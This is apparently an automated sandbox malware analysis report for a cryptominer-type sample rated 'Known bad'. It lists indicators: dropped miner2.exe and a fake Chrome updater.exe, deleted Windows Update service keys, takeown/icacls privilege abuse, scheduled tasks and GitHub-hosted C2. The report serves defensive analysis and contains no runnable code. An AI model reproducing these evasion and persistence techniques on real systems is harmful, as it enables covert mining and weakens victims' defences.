Malware Analysis Report

2024-11-16 12:27

Sample ID 240319-xfh6pscd3x
Target 6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
SHA256 6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
Tags
discovery evasion exploit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28

Threat Level: Known bad

The file 6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28 was found to be: Known bad.

Malicious Activity Summary

discovery evasion exploit

Modifies security service

Stops running service(s)

Possible privilege escalation attempt

Modifies file permissions

Executes dropped EXE

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry key

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-19 18:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-19 18:47

Reported

2024-03-19 18:51

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\miner2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Temp\miner2.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Google\Chrome\updater.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Google\Chrome\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Temp\miner2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 2668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 4340 wrote to memory of 1220 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 1220 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 4596 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 4596 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 1540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 1540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4596 wrote to memory of 4500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 4500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 1108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 3760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 3760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 3148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 3148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 1044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 1044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 4236 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 4236 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 4696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 4696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4476 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4476 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 2448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4596 wrote to memory of 2448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4596 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4596 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4596 wrote to memory of 4856 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4856 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 5088 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 5088 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3340 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3340 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4340 wrote to memory of 3332 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 3332 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

